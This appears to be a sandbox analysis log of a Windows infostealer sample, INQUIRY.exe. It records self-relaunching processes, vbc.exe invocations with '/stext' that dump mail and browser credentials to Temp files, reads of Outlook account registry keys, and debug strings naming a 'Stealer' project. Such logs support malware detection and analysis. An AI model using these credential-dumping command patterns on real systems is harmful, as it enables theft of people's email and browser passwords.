                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdbi source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb1 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.698848743.00000000049D4000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdbJhgiX source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb$hAi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb/ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: profapi.pdbkRi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb6hSi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winnsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb] source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\mscorlib.pdbd source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdbo source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdbqa{ source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: INQUIRY.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: sxs.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rtutils.pdb? source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoree.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbxi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Z[zTs5.pdb6 source: INQUIRY.exe, 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp
                    Source: Binary string: cordacwks.pdb^hkiY source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb@hmi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdbG source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb) source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: security.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb{ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdbLhYiL source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbo source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp
                    Source: Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb7 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.698225687.0000000002BC7000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb9 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb&kpir source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb(kji source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb# source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: .pdb* source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: secur32.pdbvi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb5 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb! source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbe source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcr80.i386.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdbq source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb.h;i source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb"hOi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winhttp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorsec.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorwks.pdb% source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbH source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rtutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: mscorwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb8hUi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorjit.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: shfolder.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdbe source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb_ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
